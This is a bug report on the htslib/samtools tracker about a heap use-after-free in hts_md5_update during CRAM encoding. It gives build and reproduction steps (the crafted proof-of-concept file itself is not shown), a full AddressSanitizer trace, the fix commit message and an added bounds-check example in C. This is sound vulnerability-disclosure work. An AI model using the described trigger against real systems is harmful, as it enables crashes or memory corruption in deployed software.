
Use-after-free during hts_md5_update #1698

Closed
OctavioGalland opened this issue Nov 16, 2023 · 0 comments

Summary

Use-after-free in hts_md5_update during parsing of a crafted SAM/FASTA file pair.

Environment

Built using LLVM 14 with ASAN on Ubuntu 22.04

How to reproduce

Build with ASAN on latest commit like so:

git clone --recursive https://github.com/samtools/htslib
cd htslib
autoreconf -i
CC=clang-14 CXX=clang++-14 CFLAGS="-fsanitize=address -g" CXXFLAGS="-fsanitize=address -g" LDFLAGS="-fsanitize=address -g" ./configure
make -j$(nproc)

git clone --recursive https://github.com/samtools/samtools
cd samtools
autoheader
autoconf -Wno-syntax
CC=clang-14 CXX=clang++-14 CFLAGS="-fsanitize=address -g -I$(pwd)/../htslib" CXXFLAGS="-fsanitize=address -g -I$(pwd)/../htslib" LDFLAGS="-fsanitize=address -g -L$(pwd)/../htslib" ./configure
make -j$(nproc)

Within the samtools folder, get the poc file and reproduce with:

./samtools view -C -T ../htslib/test/c2.fa poc

Which on my setup outputs:

(binary CRAM output written to stdout, not shown)
[W::sam_parse1] unrecognized reference name "c1"; treated as unmapped
[W::sam_parse1] unrecognized reference name "c1"; treated as unmapped
[W::sam_parse1] unrecognized reference name "c1"; treated as unmapped
[W::sam_parse1] unrecognized reference name "c1"; treated as unmapped
=================================================================
==12230==ERROR: AddressSanitizer: heap-use-after-free on address 0x6020000051b0 at pc 0x55cc6044fc97 bp 0x7ffd1d4ace80 sp 0x7ffd1d4ac650
READ of size 1 at 0x6020000051b0 thread T0
    #0 0x55cc6044fc96 in __asan_memcpy (/home/octavio/samtools/samtools+0x132c96) (BuildId: 7078ea94d4e08689f85e1df47e2d609c021d2440)
    #1 0x55cc607633e9 in hts_md5_update /home/octavio/htslib/md5.c:268:2
    #2 0x55cc60821cbd in cram_encode_container /home/octavio/htslib/cram/cram_encode.c:2041:17
    #3 0x55cc6089196c in cram_flush_container /home/octavio/htslib/cram/cram_io.c:4128:14
    #4 0x55cc60892795 in cram_flush_container_mt /home/octavio/htslib/cram/cram_io.c:4280:16
    #5 0x55cc6083bfb7 in cram_next_container /home/octavio/htslib/cram/cram_encode.c:3129:19
    #6 0x55cc60839ddc in cram_put_bam_seq /home/octavio/htslib/cram/cram_encode.c:3889:30
    #7 0x55cc607a74f0 in sam_write1 /home/octavio/htslib/sam.c:4437:16
    #8 0x55cc604b6b1c in check_sam_write1 /home/octavio/samtools/sam_view.c:404:13
    #9 0x55cc604b8f2a in process_one_record /home/octavio/samtools/sam_view.c:715:17
    #10 0x55cc604ae3ec in stream_view /home/octavio/samtools/sam_view.c:758:18
    #11 0x55cc604a9be8 in main_samview /home/octavio/samtools/sam_view.c:1363:15
    #12 0x55cc60528eed in main /home/octavio/samtools/bamtk.c:244:55
    #13 0x7f1911029d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #14 0x7f1911029e3f in __libc_start_main csu/../csu/libc-start.c:392:3
    #15 0x55cc603cdb24 in _start (/home/octavio/samtools/samtools+0xb0b24) (BuildId: 7078ea94d4e08689f85e1df47e2d609c021d2440)

0x6020000051b0 is located 0 bytes inside of 1-byte region [0x6020000051b0,0x6020000051b1)
freed by thread T0 here:
    #0 0x55cc60450d96 in __interceptor_realloc (/home/octavio/samtools/samtools+0x133d96) (BuildId: 7078ea94d4e08689f85e1df47e2d609c021d2440)
    #1 0x55cc60707c38 in ks_resize /home/octavio/htslib/./htslib/kstring.h:160:19
    #2 0x55cc60700703 in kputsn /home/octavio/htslib/./htslib/kstring.h:237:24
    #3 0x55cc606f3896 in build_header_line /home/octavio/htslib/header.c:736:11
    #4 0x55cc60701697 in sam_hrecs_rebuild_lines /home/octavio/htslib/header.c:753:13
    #5 0x55cc606ef797 in sam_hrecs_rebuild_text /home/octavio/htslib/header.c:2011:9
    #6 0x55cc606edd42 in sam_hdr_rebuild /home/octavio/htslib/header.c:1258:9
    #7 0x55cc606ed94f in sam_hdr_length /home/octavio/htslib/header.c:1208:22
    #8 0x55cc60897dff in cram_write_SAM_hdr /home/octavio/htslib/cram/cram_io.c:4953:18
    #9 0x55cc6078da10 in sam_hdr_write /home/octavio/htslib/sam.c:2206:13
    #10 0x55cc604a7f8a in main_samview /home/octavio/samtools/sam_view.c:1250:17
    #11 0x55cc60528eed in main /home/octavio/samtools/bamtk.c:244:55
    #12 0x7f1911029d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16

previously allocated by thread T0 here:
    #0 0x55cc60450d96 in __interceptor_realloc (/home/octavio/samtools/samtools+0x133d96) (BuildId: 7078ea94d4e08689f85e1df47e2d609c021d2440)
    #1 0x55cc60707c38 in ks_resize /home/octavio/htslib/./htslib/kstring.h:160:19
    #2 0x55cc60707a9c in kputc_ /home/octavio/htslib/./htslib/kstring.h:262:6
    #3 0x55cc606f386a in build_header_line /home/octavio/htslib/header.c:735:11
    #4 0x55cc60701697 in sam_hrecs_rebuild_lines /home/octavio/htslib/header.c:753:13
    #5 0x55cc606ef797 in sam_hrecs_rebuild_text /home/octavio/htslib/header.c:2011:9
    #6 0x55cc606edd42 in sam_hdr_rebuild /home/octavio/htslib/header.c:1258:9
    #7 0x55cc606ed94f in sam_hdr_length /home/octavio/htslib/header.c:1208:22
    #8 0x55cc60897dff in cram_write_SAM_hdr /home/octavio/htslib/cram/cram_io.c:4953:18
    #9 0x55cc6078da10 in sam_hdr_write /home/octavio/htslib/sam.c:2206:13
    #10 0x55cc604a7f8a in main_samview /home/octavio/samtools/sam_view.c:1250:17
    #11 0x55cc60528eed in main /home/octavio/samtools/bamtk.c:244:55
    #12 0x7f1911029d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16

SUMMARY: AddressSanitizer: heap-use-after-free (/home/octavio/samtools/samtools+0x132c96) (BuildId: 7078ea94d4e08689f85e1df47e2d609c021d2440) in __asan_memcpy
Shadow bytes around the buggy address:
  0x0c047fff89e0: fa fa fd fa fa fa 00 fa fa fa 04 fa fa fa 03 fa
  0x0c047fff89f0: fa fa 00 07 fa fa 00 00 fa fa 04 fa fa fa 00 00
  0x0c047fff8a00: fa fa 00 00 fa fa 04 fa fa fa 00 00 fa fa 00 00
  0x0c047fff8a10: fa fa 04 fa fa fa 00 00 fa fa 00 00 fa fa fd fd
  0x0c047fff8a20: fa fa 00 00 fa fa fd fa fa fa fd fd fa fa 00 fa
=>0x0c047fff8a30: fa fa 00 01 fa fa[fd]fa fa fa fd fa fa fa fd fa
  0x0c047fff8a40: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fa
  0x0c047fff8a50: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fa
  0x0c047fff8a60: fa fa fd fd fa fa fd fa fa fa fd fd fa fa fd fa
  0x0c047fff8a70: fa fa fd fd fa fa fd fd fa fa fd fa fa fa fd fd
  0x0c047fff8a80: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==12230==ABORTING
jkbonfield added a commit to jkbonfield/htslib that referenced this issue Nov 16, 2023
This was checked for with aligned data, but unmapped "placed" reads
could start beyond the reference end and cr->aend was dutifully set
where it claimed to start. This could cause buffer read-overruns when
computing the reference md5.

Fixes samtools#1698, fixes samtools#1700
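The commit message gives the mechanism: for an unmapped but "placed" read the encoder trusted a start position beyond the reference end, so the reference md5 read past the reference buffer (the trace shows the over-read landing in a kstring chunk freed by build_header_line, which is why ASan reports it as a use-after-free rather than an overflow). The C below is an added illustration of the range check such an encoder needs, not htslib's own fix; the reference bases, positions and the names ref_range_t, clamp_ref_range and hash_ref_slice are constructed for the example.

```c
#include <stdint.h>
#include <stdio.h>

/* Added example, not htslib code. A "placed" unmapped read carries a position,
 * and the encoder derived an end coordinate (cr->aend in htslib) from it
 * without confirming the range lies inside the reference. ref_range_t,
 * clamp_ref_range and hash_ref_slice are hypothetical names. */

typedef struct {
    int64_t start;   /* 0-based inclusive start of the reference slice */
    int64_t end;     /* 0-based exclusive end */
} ref_range_t;

/* Returns 1 and fills *out when [pos, aend) is a usable slice of a reference
 * of ref_len bases. Returns 0 (nothing to hash) when the read is placed at or
 * beyond the reference end or aend does not extend past pos; aend is clipped
 * to ref_len so a caller can never read past the buffer. */
int clamp_ref_range(int64_t ref_len, int64_t pos, int64_t aend, ref_range_t *out)
{
    if (ref_len <= 0 || pos < 0 || pos >= ref_len)
        return 0;                  /* start outside the reference: skip */
    if (aend > ref_len)
        aend = ref_len;            /* clip the end to the buffer */
    if (aend <= pos)
        return 0;
    out->start = pos;
    out->end = aend;
    return 1;
}

/* Stand-in for hts_md5_update: a byte sum over the clamped slice, so the
 * example runs without a crypto library. Returns -1 when nothing is hashed. */
long hash_ref_slice(const char *ref, int64_t ref_len, int64_t pos, int64_t aend)
{
    ref_range_t r;
    if (!clamp_ref_range(ref_len, pos, aend, &r))
        return -1;
    long sum = 0;
    for (int64_t i = r.start; i < r.end; i++)
        sum += (unsigned char)ref[i];
    return sum;
}

int main(void)
{
    /* Constructed 10-base reference. Without the check, a read placed at 33
     * with aend 43 would make the hash read bytes past a 10-byte buffer. */
    const char ref[] = "AACCGCGGTT";
    printf("%ld\n", hash_ref_slice(ref, 10, 0, 10));   /* 712: whole reference */
    printf("%ld\n", hash_ref_slice(ref, 10, 33, 43));  /* -1: placed past the end */
    printf("%ld\n", hash_ref_slice(ref, 10, 8, 43));   /* 168: clipped to [8,10) */
    return 0;
}
```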